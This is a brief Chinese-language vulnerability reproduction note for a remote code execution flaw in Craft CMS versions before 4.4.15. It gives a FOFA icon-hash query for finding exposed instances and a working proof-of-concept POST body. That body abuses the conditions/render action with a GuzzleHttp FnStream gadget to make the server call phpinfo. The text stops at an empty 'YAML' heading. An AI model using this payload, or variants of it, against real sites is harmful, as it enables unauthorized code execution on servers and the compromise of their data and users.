1.简介
Craft CMS是一个创建数字体验的平台,是美国Pixel&tonic公司的一套内容管理系统(CMS)。该CMS在Craft CMS<4.4.15 版本存在远程代码执行漏洞
2.Fofa
icon_hash="-47932290"
3.漏洞复现
POC:action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
4.YAML